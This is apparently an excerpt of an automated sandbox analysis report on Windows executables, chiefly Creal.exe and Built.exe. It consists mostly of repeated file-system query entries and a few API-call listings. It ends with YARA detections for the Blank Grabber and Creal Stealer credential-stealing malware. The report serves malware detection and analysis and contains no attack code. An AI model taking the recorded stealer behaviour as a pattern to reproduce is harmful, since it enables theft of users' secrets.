              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\_wmi.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\pyexpat.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\jaraco VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF6063A400C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6063A400C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D9265C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,2_2_00007FF6D9265C00
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF606386768 GetVersionExW,0_2_00007FF606386768

              Stealing of Sensitive Information

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000003.00000003.2109058666.00000124EBC34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2109058666.00000124EBC32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Built.exe PID: 2760, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Built.exe PID: 2536, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI27602\rarreg.key, type: DROPPED
              Yara detected Creal Stealer
